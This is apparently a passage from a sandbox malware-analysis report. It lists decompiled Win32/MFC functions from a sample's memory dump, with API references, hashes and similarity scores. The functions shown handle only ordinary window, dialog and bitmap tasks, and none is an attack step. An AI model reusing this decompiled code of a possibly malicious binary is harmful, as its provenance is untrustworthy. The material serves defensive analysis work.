                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                  • String ID:
                  • API String ID: 1602911419-0
                  • Opcode ID: 3eabf6933f8a465c32215d93b5cbb27301b6b1d15204a816b1691e54607b9b49
                  • Instruction ID: 8d18e93fed3be8de346e5a2b0c1457ec88b82c6e25465da463eb5e78a3a475d2
                  • Opcode Fuzzy Hash: 3eabf6933f8a465c32215d93b5cbb27301b6b1d15204a816b1691e54607b9b49
                  • Instruction Fuzzy Hash: E3117C71D00219DFDB00EFA5E486AED7BB0FF08355F50806EF814A7251DB389A059F58
                  Uniqueness

                  Uniqueness Score: 0.09%

                  Function 00420AB2, Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                  Download Yara Rule
                  C-Code - Quality: 38%
                  			E00420AB2(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_push(5);
				_push(_a4);
				while(1) {
					_t12 = GetWindow();
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0xffff && (GetWindowLongW(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_push(2);
					_push(_t21);
				}
				return _t12;
			}






                  0x00420ac3
                  0x00420acf
                  0x00420ad1
                  0x00420b16
                  0x00420b16
                  0x00420b18
                  0x00420b1c
                  0x00000000
                  0x00000000
                  0x00420ae2
                  0x00420af9
                  0x00420aff
                  0x00420b11
                  0x00000000
                  0x00420b24
                  0x00420b11
                  0x00420b13
                  0x00420b15
                  0x00420b15
                  0x00420b21

                  APIs
                  • ClientToScreen.USER32(?,?), ref: 00420AC3
                  • GetDlgCtrlID.USER32(00000000), ref: 00420AD7
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00420AE7
                  • GetWindowRect.USER32(00000000,?), ref: 00420AF9
                  • PtInRect.USER32(?,?,?), ref: 00420B09
                  • GetWindow.USER32(?,00000005), ref: 00420B16
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$Rect$ClientCtrlLongScreen
                  • String ID:
                  • API String ID: 1315500227-0
                  • Opcode ID: 3c6d4f7b08a955105ea467ebb56ca48002f540298c4fdc68c7896c3943357c5f
                  • Instruction ID: 3c119bf798499c757b55538c10e404d99049b784118abeabbd0072bf16216c48
                  • Opcode Fuzzy Hash: 3c6d4f7b08a955105ea467ebb56ca48002f540298c4fdc68c7896c3943357c5f
                  • Instruction Fuzzy Hash: 9601A232240129BBCB319F94EC0CEAF7BACEF51724F404021F951D21A1E778E925CB99
                  Uniqueness

                  Uniqueness Score: 0.18%

                  Function 0041C362, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 209windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 63%
                  			E0041C362(intOrPtr __ecx, void* __edx, intOrPtr _a4, RECT* _a8) {
				signed int _v8;
				char _v528;
				RECT* _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				char _v552;
				intOrPtr _v556;
				signed int _v560;
				struct tagRECT _v576;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t71;
				signed char _t79;
				signed int _t84;
				signed int _t89;
				signed int _t91;
				signed int _t99;
				signed int _t114;
				intOrPtr _t128;
				void* _t129;
				intOrPtr _t136;
				void* _t151;
				signed int _t153;
				void* _t154;
				intOrPtr _t157;
				void* _t158;
				signed int _t163;

				_t151 = __edx;
				_t130 = __ecx;
				_t161 = _t163;
				_t71 =  *0x44c364; // 0xa6e2bca1
				_v8 = _t71 ^ _t163;
				_t157 = _a4;
				_t128 = __ecx;
				_t153 = 0;
				_v536 = _t157;
				_v532 = _a8;
				if(__ecx == 0) {
					L2:
					E00413DD0(_t130);
				}
				if(_t157 == _t153) {
					goto L2;
				}
				_t7 = _t157 + 0x20; // 0x69614d43
				_t76 = GetWindowRect( *_t7,  &_v576);
				if( *((intOrPtr*)(_t157 + 0x90)) != _t128 || _v532 != _t153 && EqualRect( &_v576, _v532) == 0) {
					if( *((intOrPtr*)(_t128 + 0x98)) != _t153 && ( *(_t157 + 0x88) & 0x00000040) != 0) {
						 *(_t128 + 0x84) =  *(_t128 + 0x84) | 0x00000040;
					}
					 *(_t128 + 0x84) =  *(_t128 + 0x84) & 0xfffffff9;
					_t20 = _t157 + 0x84; // 0x0
					_t79 =  *_t20 & 0x00000006 |  *(_t128 + 0x84);
					 *(_t128 + 0x84) = _t79;
					_t175 = _t79 & 0x00000040;
					if((_t79 & 0x00000040) == 0) {
						_push(0x104);
						_push( &_v528);
						E00411F38(_t128, _t157, _t153, _t157, _t175);
						E004208C1(_t157, _t151,  *((intOrPtr*)(_t128 + 0x20)),  &_v528);
					}
					_t28 = _t157 + 0x84; // 0x0
					_t30 = _t157 + 0x84; // 0x0
					_t84 = ( *_t28 ^  *(_t128 + 0x84)) & 0x0000f000 ^  *_t30 | 0x00000f00;
					if( *((intOrPtr*)(_t128 + 0x98)) == _t153) {
						_t85 = _t84 & 0xfffffffe;
						__eflags = _t84 & 0xfffffffe;
					} else {
						_t85 = _t84 | 0x00000001;
					}
					E00422C07(_t157, _t85);
					_v556 = _t153;
					if( *((intOrPtr*)(_t157 + 0x90)) != _t128) {
						_t34 = _t157 + 0x20; // 0x69614d43
						if(IsWindowVisible( *_t34) != 0) {
							E00411EB6(_t157, _t153, _t153, _t153, _t153, _t153, 0x97);
							_v556 = 1;
						}
					}
					_v560 = _v560 | 0xffffffff;
					if(_v532 == _t153) {
						E0041B59E(_t128 + 0x9c, _t157);
						E0041B59E(_t128 + 0x9c, _t153);
						_t89 =  *0x44fc24; // 0x2
						_t91 =  *0x44fc20; // 0x2
						_t135 = _t157;
						E00411EB6(_t157, _t153,  ~_t91,  ~_t89, _t153, _t153, 0x115);
					} else {
						E00406B80( &_v552, _v532);
						E004144FC(_t128,  &_v552);
						asm("cdq");
						asm("cdq");
						_push((_v540 - _v548 - _t151 >> 1) + _v548);
						_push((_v544 - _v552 - _t151 >> 1) + _v552);
						_push(_v536);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t114 = E0041B858(_t128);
						_t135 = _v536;
						_v560 = _t114;
						E00411EB6(_v536, 0, _v552, _v548, _v544 - _v552, _v540 - _v548, 0x114);
						_t157 = _v536;
						_t153 = 0;
					}
					_t61 = _t157 + 0x20; // 0x69614d43
					if(E0040E20E(_t128, _t135, GetParent( *_t61)) != _t128) {
						E0041B5D2(_t157, _t128);
					}
					_t62 = _t157 + 0x90; // 0x65726854
					_t136 =  *_t62;
					if(_t136 != _t128) {
						__eflags = _t136 - _t153;
						if(_t136 != _t153) {
							__eflags =  *((intOrPtr*)(_t128 + 0x98)) - _t153;
							if( *((intOrPtr*)(_t128 + 0x98)) == _t153) {
								L29:
								_t99 = 0;
								__eflags = 0;
							} else {
								__eflags =  *((intOrPtr*)(_t136 + 0x98)) - _t153;
								if( *((intOrPtr*)(_t136 + 0x98)) != _t153) {
									goto L29;
								} else {
									_t99 = 1;
								}
							}
							_push(_t99);
							_push(0xffffffff);
							goto L31;
						}
					} else {
						_push(_t153);
						_push(_v560);
						L31:
						_push(_t157);
						E0041BC28(_t136, _t153);
					}
					 *((intOrPtr*)(_t157 + 0x90)) = _t128;
					if(_v556 != _t153) {
						E00411EB6(_t157, _t153, _t153, _t153, _t153, _t153, 0x57);
					}
					E0041BBBF(_t128, _t128, _t157);
					 *(E004159C1(_t128) + 0xe4) =  *(_t76 + 0xe4) | 0x0000000c;
				}
				_pop(_t154);
				_pop(_t158);
				_pop(_t129);
				return E00427DFF(_t76, _t129, _v8 ^ _t161, _t151, _t154, _t158);
			}


































                  0x0041c362
                  0x0041c362
                  0x0041c365
                  0x0041c36d
                  0x0041c374
                  0x0041c37c
                  0x0041c380
                  0x0041c382
                  0x0041c384
                  0x0041c38a
                  0x0041c392
                  0x0041c394
                  0x0041c394
                  0x0041c394
                  0x0041c39b
                  0x00000000
                  0x00000000
                  0x0041c3a4
                  0x0041c3a7
                  0x0041c3b3
                  0x0041c3e2
                  0x0041c3ed
                  0x0041c3ed
                  0x0041c3f4
                  0x0041c3fb
                  0x0041c40a
                  0x0041c40c
                  0x0041c412
                  0x0041c414
                  0x0041c416
                  0x0041c421
                  0x0041c424
                  0x0041c433
                  0x0041c433
                  0x0041c438
                  0x0041c449
                  0x0041c44f
                  0x0041c45a
                  0x0041c461
                  0x0041c461
                  0x0041c45c
                  0x0041c45c
                  0x0041c45c
                  0x0041c467
                  0x0041c46c
                  0x0041c478
                  0x0041c47a
                  0x0041c485
                  0x0041c493
                  0x0041c498
                  0x0041c498
                  0x0041c485
                  0x0041c4a2
                  0x0041c4af
                  0x0041c571
                  0x0041c57d
                  0x0041c582
                  0x0041c591
                  0x0041c59a
                  0x0041c59c
                  0x0041c4b5
                  0x0041c4c1
                  0x0041c4cf
                  0x0041c4e6
                  0x0041c4ff
                  0x0041c50a
                  0x0041c50b
                  0x0041c511
                  0x0041c517
                  0x0041c518
                  0x0041c519
                  0x0041c51c
                  0x0041c51d
                  0x0041c522
                  0x0041c528
                  0x0041c55b
                  0x0041c560
                  0x0041c566
                  0x0041c566
                  0x0041c5a1
                  0x0041c5b2
                  0x0041c5b7
                  0x0041c5b7
                  0x0041c5bc
                  0x0041c5bc
                  0x0041c5c4
                  0x0041c5cf
                  0x0041c5d1
                  0x0041c5d3
                  0x0041c5d9
                  0x0041c5e8
                  0x0041c5e8
                  0x0041c5e8
                  0x0041c5db
                  0x0041c5db
                  0x0041c5e1
                  0x00000000
                  0x0041c5e3
                  0x0041c5e5
                  0x0041c5e5
                  0x0041c5e1
                  0x0041c5ea
                  0x0041c5eb
                  0x00000000
                  0x0041c5eb
                  0x0041c5c6
                  0x0041c5c6
                  0x0041c5c7
                  0x0041c5ed
                  0x0041c5ed
                  0x0041c5ee
                  0x0041c5ee
                  0x0041c5f3
                  0x0041c5ff
                  0x0041c60a
                  0x0041c60a
                  0x0041c612
                  0x0041c61e
                  0x0041c61e
                  0x0041c628
                  0x0041c629
                  0x0041c62c
                  0x0041c633

                  APIs
                  • GetWindowRect.USER32(69614D43,?), ref: 0041C3A7
                  • EqualRect.USER32(?,?), ref: 0041C3CE
                  • IsWindowVisible.USER32(69614D43), ref: 0041C47D
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                    • Part of subcall function 0041B858: GetWindowRect.USER32(?,?), ref: 0041B8C4
                    • Part of subcall function 00411EB6: SetWindowPos.USER32(69614D43,00000000,0044B1B0,00000000,00000115,00000000,00000000), ref: 00411EDE
                  • GetParent.USER32(69614D43), ref: 0041C5A4
                    • Part of subcall function 0041B5D2: SetParent.USER32(69614D43,00000000), ref: 0041B5E5
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$Rect$Parent$EqualException@8ThrowVisible
                  • String ID: @
                  • API String ID: 3297862425-2766056989
                  • Opcode ID: cf983c9ae98adb0141863d2ac5171b0deb360f95187c45a19b12fc5579b0d53f
                  • Instruction ID: 38db4fd9eb10d967e2e3fd90bfb5e0ed549e930bf926492dff71c7ea3bc83b05
                  • Opcode Fuzzy Hash: cf983c9ae98adb0141863d2ac5171b0deb360f95187c45a19b12fc5579b0d53f
                  • Instruction Fuzzy Hash: C071B471A40519ABCB20EF69CC89BEEB7B5BF48304F1045AEE51EE6151DB349E808F58
                  Uniqueness

                  Uniqueness Score: 10.55%

                  Function 00425F01, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 111stringUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00425F01(void** __ecx, WCHAR* _a4, short _a8) {
				signed int _v8;
				signed int* _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				void* __ebx;
				signed int _t56;
				void* _t57;
				intOrPtr _t58;
				short* _t59;
				signed int _t61;
				signed int* _t73;
				short* _t75;
				void* _t82;
				signed int* _t89;
				signed int _t90;
				void* _t91;
				void** _t92;
				intOrPtr _t94;
				signed int _t97;
				void* _t99;

				_t92 = __ecx;
				if(__ecx[1] != 0) {
					_t73 = GlobalLock( *__ecx);
					_v12 = _t73;
					_v8 = 0 | _t73[0] == 0x0000ffff;
					_v20 = E00425D35(_t73);
					_t94 = (0 | _v8 != 0x00000000) + (0 | _v8 != 0x00000000) + 1 + (0 | _v8 != 0x00000000) + (0 | _v8 != 0x00000000) + 1;
					_v24 = _t94;
					if(_v8 == 0) {
						 *_t73 =  *_t73 | 0x00000040;
					} else {
						_t73[3] = _t73[3] | 0x00000040;
					}
					_t56 = lstrlenW(_a4);
					if(_t56 >= 0x20) {
						L15:
						_t57 = 0;
						goto L18;
					} else {
						_t58 = _t94 + 2 + _t56 * 2;
						_v16 = _t58;
						if(_t58 < _t94) {
							goto L15;
						}
						_t59 = E00425D7C(_t73);
						_t82 = 0;
						_t75 = _t59;
						if(_v20 != 0) {
							_t82 = _t94 + 2 + E00429211(_t75 + _t94) * 2;
						}
						_t29 = _v16 + 3; // 0x3
						_t89 = _v12;
						_t32 = _t75 + 3; // 0x3
						_t61 = _t82 + _t32 & 0xfffffffc;
						_t97 = _t75 + _t29 & 0xfffffffc;
						_v20 = _t61;
						if(_v8 == 0) {
							_t90 =  *(_t89 + 8) & 0x0000ffff;
						} else {
							_t90 =  *(_t89 + 0x10) & 0x0000ffff;
						}
						if(_v16 == _t82 || _t90 <= 0) {
							L17:
							 *_t75 = _a8;
							E0040B6B0(_t75 + _v24, _t75 + _v24, _v16 - _v24, _a4, _v16 - _v24);
							_t92[1] = _t92[1] + _t97 - _v20;
							GlobalUnlock( *_t92);
							_t92[2] = _t92[2] & 0x00000000;
							_t57 = 1;
							L18:
							return _t57;
						} else {
							_t91 = _t92[1];
							_t86 = _t91 - _t61 + _v12;
							if(_t91 - _t61 + _v12 <= _t91) {
								E0040B6B0(_t75, _t97, _t86, _t61, _t86);
								_t99 = _t99 + 0x10;
								goto L17;
							}
							goto L15;
						}
					}
				}
				return 0;
			}
























                  0x00425f0a
                  0x00425f10
                  0x00425f23
                  0x00425f34
                  0x00425f37
                  0x00425f3f
                  0x00425f55
                  0x00425f57
                  0x00425f5a
                  0x00425f62
                  0x00425f5c
                  0x00425f5c
                  0x00425f5c
                  0x00425f68
                  0x00425f71
                  0x00425fdb
                  0x00425fdb
                  0x00000000
                  0x00425f73
                  0x00425f73
                  0x00425f79
                  0x00425f7c
                  0x00000000
                  0x00000000
                  0x00425f7f
                  0x00425f85
                  0x00425f87
                  0x00425f8c
                  0x00425f98
                  0x00425f98
                  0x00425f9f
                  0x00425fa3
                  0x00425fa6
                  0x00425faa
                  0x00425fad
                  0x00425fb4
                  0x00425fb7
                  0x00425fbf
                  0x00425fb9
                  0x00425fb9
                  0x00425fb9
                  0x00425fc6
                  0x00425feb
                  0x00425ff2
                  0x00426002
                  0x0042600f
                  0x00426012
                  0x00426018
                  0x0042601e
                  0x0042601f
                  0x00000000
                  0x00425fcd
                  0x00425fcd
                  0x00425fd4
                  0x00425fd9
                  0x00425fe3
                  0x00425fe8
                  0x00000000
                  0x00425fe8
                  0x00000000
                  0x00425fd9
                  0x00425fc6
                  0x00425f71
                  0x00000000

                  APIs
                  • GlobalLock.KERNEL32(?,762C5DDF,System,0000000A,004260B9,System,?,?,00000000), ref: 00425F1D
                  • lstrlenW.KERNEL32(?), ref: 00425F68
                  • _wcslen.LIBCMT ref: 00425F92
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: GlobalLock_wcslenlstrlen
                  • String ID: System
                  • API String ID: 2647411976-3470857405
                  • Opcode ID: 2441d7b0fb694e26714863b5f49c84b091091f0473a09fec826e39981e6f6696
                  • Instruction ID: 8c8cc497bbc57e996c04b924fb8f2349e3915eaee87331b7d34588128dc58608
                  • Opcode Fuzzy Hash: 2441d7b0fb694e26714863b5f49c84b091091f0473a09fec826e39981e6f6696
                  • Instruction Fuzzy Hash: 1F411371A00525EFCB14DFA4E985A6FB7B4FF04304F51856BE812E7281D7389E51CB98
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00411B43, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 81%
                  			E00411B43(void* __edx) {
				signed int _v8;
				void _v136;
				int _v140;
				int _v144;
				char _v148;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t21;
				unsigned int _t23;
				char* _t35;
				struct HBITMAP__* _t37;
				unsigned int _t40;
				signed short _t42;
				void* _t46;
				int _t47;
				unsigned int _t49;
				void* _t52;
				signed char* _t53;
				signed int _t58;
				void* _t59;
				signed int _t62;
				void* _t63;
				void* _t64;
				signed int _t66;
				signed int _t68;

				_t52 = __edx;
				_t66 = _t68;
				_t21 =  *0x44c364; // 0xa6e2bca1
				_v8 = _t21 ^ _t66;
				_t23 = GetMenuCheckMarkDimensions();
				_t47 = _t23;
				_t40 = _t23 >> 0x10;
				_v144 = _t47;
				_v140 = _t40;
				if(_t47 <= 4 || _t40 <= 5) {
					E00413DD0(_t47);
				}
				if(_t47 > 0x20) {
					_t47 = 0x20;
					_v144 = _t47;
				}
				asm("cdq");
				_t62 = _t47 + 0xf >> 4;
				_t58 = (_t47 - 4 - _t52 >> 1) + (_t62 << 4) - _t47;
				if(_t58 > 0xc) {
					_t58 = 0xc;
				}
				if(_t40 > 0x20) {
					_t40 = 0x20;
					_v140 = _t40;
				}
				E004281D0(_t58,  &_v136, 0xff, 0x80);
				_t35 = _t66 + (_t40 - 6 >> 1) * _t62 * 2 - 0x84;
				_t53 = 0x43df90;
				_t63 = _t62 + _t62;
				_v148 = 5;
				do {
					_t42 = ( *_t53 & 0x000000ff) << _t58;
					_t53 =  &(_t53[1]);
					_t49 =  !_t42 & 0x0000ffff;
					 *_t35 = _t49 >> 8;
					 *(_t35 + 1) = _t49;
					_t35 = _t35 + _t63;
					_t15 =  &_v148;
					 *_t15 = _v148 - 1;
				} while ( *_t15 != 0);
				_t37 = CreateBitmap(_v144, _v140, 1, 1,  &_v136);
				_pop(_t59);
				_pop(_t64);
				 *0x44fc60 = _t37;
				_pop(_t46);
				if(_t37 == 0) {
					 *0x44fc60 = _t37;
				}
				return E00427DFF(_t37, _t46, _v8 ^ _t66, _t53, _t59, _t64);
			}






























                  0x00411b43
                  0x00411b46
                  0x00411b4e
                  0x00411b55
                  0x00411b5b
                  0x00411b61
                  0x00411b6a
                  0x00411b6d
                  0x00411b73
                  0x00411b79
                  0x00411b80
                  0x00411b80
                  0x00411b88
                  0x00411b8c
                  0x00411b8d
                  0x00411b8d
                  0x00411b96
                  0x00411b9c
                  0x00411baa
                  0x00411baf
                  0x00411bb3
                  0x00411bb3
                  0x00411bb7
                  0x00411bbb
                  0x00411bbc
                  0x00411bbc
                  0x00411bd3
                  0x00411be3
                  0x00411bea
                  0x00411bef
                  0x00411bf1
                  0x00411bfb
                  0x00411c01
                  0x00411c04
                  0x00411c08
                  0x00411c10
                  0x00411c12
                  0x00411c15
                  0x00411c17
                  0x00411c17
                  0x00411c17
                  0x00411c36
                  0x00411c3c
                  0x00411c3d
                  0x00411c3e
                  0x00411c43
                  0x00411c46
                  0x00411c54
                  0x00411c54
                  0x00411c64

                  APIs
                  • GetMenuCheckMarkDimensions.USER32 ref: 00411B5B
                  • _memset.LIBCMT ref: 00411BD3
                  • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 00411C36
                  • LoadBitmapW.USER32(00000000,00007FE3), ref: 00411C4E
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                  • String ID:
                  • API String ID: 4271682439-3916222277
                  • Opcode ID: 75a9ac3af90586ce2079edc930b762fa0c963262a639b2f794e791e24d5379fc
                  • Instruction ID: f5ea2f4e17038bf8802b084befe88b8a2bf3895c297ac26d65a48744e6abe9cb
                  • Opcode Fuzzy Hash: 75a9ac3af90586ce2079edc930b762fa0c963262a639b2f794e791e24d5379fc
                  • Instruction Fuzzy Hash: 48312971A042199BEB208F289CC5BE977B5FB44704F4440BBEA49D7291EA349D888B54
                  Uniqueness

                  Uniqueness Score: 1.55%

                  Function 004189BE, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                  Download Yara Rule
                  C-Code - Quality: 96%
                  			E004189BE(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t39;
				intOrPtr _t47;
				void* _t63;
				intOrPtr _t65;
				void* _t68;
				void* _t69;

				_t63 = __edx;
				_t53 = __ebx;
				_push(0x48);
				E00429294(E00439078, __ebx, __edi, __esi);
				_t65 =  *((intOrPtr*)(_t69 + 8));
				_t68 = __ecx;
				E00404820(_t69 - 0x54);
				 *(_t69 - 4) =  *(_t69 - 4) & 0x00000000;
				if((E00411D59(_t68) & 0x00004000) == 0) {
					_t32 =  *((intOrPtr*)(_t68 + 0xc4));
					_t57 = _t69 - 0x54;
					E00405AF0(__ebx, _t69 - 0x54, _t65, _t68,  *((intOrPtr*)(_t68 + 0xc4)),  *((intOrPtr*)(_t32 - 0xc)));
					if(_t65 != 0) {
						E00405700(_t69 - 0x54, " - ");
						_t57 = _t69 - 0x54;
						E00405700(_t69 - 0x54, _t65);
						_t39 =  *((intOrPtr*)(_t68 + 0x58));
						if(_t39 > 0) {
							swprintf(_t69 - 0x50, 0x20, ":%d", _t39);
							_t57 = _t69 - 0x54;
							E00405700(_t69 - 0x54, _t69 - 0x50);
						}
					}
					L9:
					_t66 =  *((intOrPtr*)(_t69 - 0x54));
					E004208C1(_t57, _t63,  *((intOrPtr*)(_t68 + 0x20)),  *((intOrPtr*)(_t69 - 0x54)));
					E004055F0(_t66 - 0x10);
					return E00429317(_t53, _t66, _t68);
				}
				if(_t65 == 0) {
					L5:
					_t44 =  *((intOrPtr*)(_t68 + 0xc4));
					_t57 = _t69 - 0x54;
					E00405AF0(_t53, _t69 - 0x54, _t65, _t68,  *((intOrPtr*)(_t68 + 0xc4)),  *((intOrPtr*)(_t44 - 0xc)));
					goto L9;
				}
				E00405700(_t69 - 0x54, _t65);
				_t47 =  *((intOrPtr*)(_t68 + 0x58));
				if(_t47 > 0) {
					swprintf(_t69 - 0x50, 0x20, ":%d", _t47);
					E00405700(_t69 - 0x54, _t69 - 0x50);
				}
				E00405700(_t69 - 0x54, " - ");
				goto L5;
			}









                  0x004189be
                  0x004189be
                  0x004189be
                  0x004189c5
                  0x004189ca
                  0x004189cd
                  0x004189d2
                  0x004189d7
                  0x004189e7
                  0x00418a3e
                  0x00418a47
                  0x00418a4b
                  0x00418a52
                  0x00418a5c
                  0x00418a62
                  0x00418a65
                  0x00418a6a
                  0x00418a6f
                  0x00418a7d
                  0x00418a89
                  0x00418a8c
                  0x00418a8c
                  0x00418a6f
                  0x00418a91
                  0x00418a91
                  0x00418a98
                  0x00418aa0
                  0x00418aaa
                  0x00418aaa
                  0x004189eb
                  0x00418a2a
                  0x00418a2a
                  0x00418a33
                  0x00418a37
                  0x00000000
                  0x00418a37
                  0x004189f1
                  0x004189f6
                  0x004189fb
                  0x00418a09
                  0x00418a18
                  0x00418a18
                  0x00418a25
                  0x00000000

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 004189C5
                    • Part of subcall function 00411D59: GetWindowLongW.USER32(?,000000F0), ref: 00411D64
                  • swprintf.LIBCMT ref: 00418A09
                    • Part of subcall function 00427E5F: __vswprintf_s_l.LIBCMT ref: 00427E73
                  • swprintf.LIBCMT ref: 00418A7D
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: swprintf$H_prolog3_LongWindow__vswprintf_s_l
                  • String ID: - $:%d
                  • API String ID: 1519946483-2359489159
                  • Opcode ID: ecb4198cebc564249fc146c4e95e9c1e24f6b17cedfcefe8256bf9ecf0dfb3bc
                  • Instruction ID: 065f3513f436dfd16c769c952297cce57e11ed919ebbbc1ead23b62b6d15edda
                  • Opcode Fuzzy Hash: ecb4198cebc564249fc146c4e95e9c1e24f6b17cedfcefe8256bf9ecf0dfb3bc
                  • Instruction Fuzzy Hash: CC215175900604EBDB10E7D1D996FEFB378EF14704F90442FB502AB196EA7CAE089B58
                  Uniqueness

                  Uniqueness Score: 3.75%

                  Function 0041E66D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 61COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0041E66D(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
				void* __edi;
				struct HWND__* _t10;
				struct HWND__* _t12;
				struct HWND__* _t14;
				struct HWND__* _t15;
				int _t19;
				void* _t21;
				void* _t25;
				struct HWND__** _t26;
				void* _t27;

				_t25 = __edx;
				_t21 = __ebx;
				_t26 = _a4;
				_t27 = __ecx;
				if(E0040C1EC(__ecx, __eflags, _t26) == 0) {
					_t10 = E0040ED5B(__ecx);
					__eflags = _t10;
					if(_t10 == 0) {
						L5:
						__eflags = _t26[1] - 0x100;
						if(_t26[1] != 0x100) {
							L13:
							return E0040C7DE(_t26);
						}
						_t12 = _t26[2];
						__eflags = _t12 - 0x1b;
						if(_t12 == 0x1b) {
							L8:
							__eflags = GetWindowLongW( *_t26, 0xfffffff0) & 0x00000004;
							if(__eflags == 0) {
								goto L13;
							}
							_t14 = E00420A6C(_t21, _t25, _t26, __eflags,  *_t26, L"Edit");
							__eflags = _t14;
							if(_t14 == 0) {
								goto L13;
							}
							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
							__eflags = _t15;
							if(_t15 == 0) {
								L12:
								SendMessageW( *(_t27 + 0x20), 0x111, 2, 0);
								goto L1;
							}
							_t19 = IsWindowEnabled(_t15);
							__eflags = _t19;
							if(_t19 == 0) {
								goto L13;
							}
							goto L12;
						}
						__eflags = _t12 - 3;
						if(_t12 != 3) {
							goto L13;
						}
						goto L8;
					}
					__eflags =  *(_t10 + 0x68);
					if( *(_t10 + 0x68) == 0) {
						goto L5;
					}
					return 0;
				}
				L1:
				return 1;
			}













                  0x0041e66d
                  0x0041e66d
                  0x0041e674
                  0x0041e678
                  0x0041e681
                  0x0041e68a
                  0x0041e68f
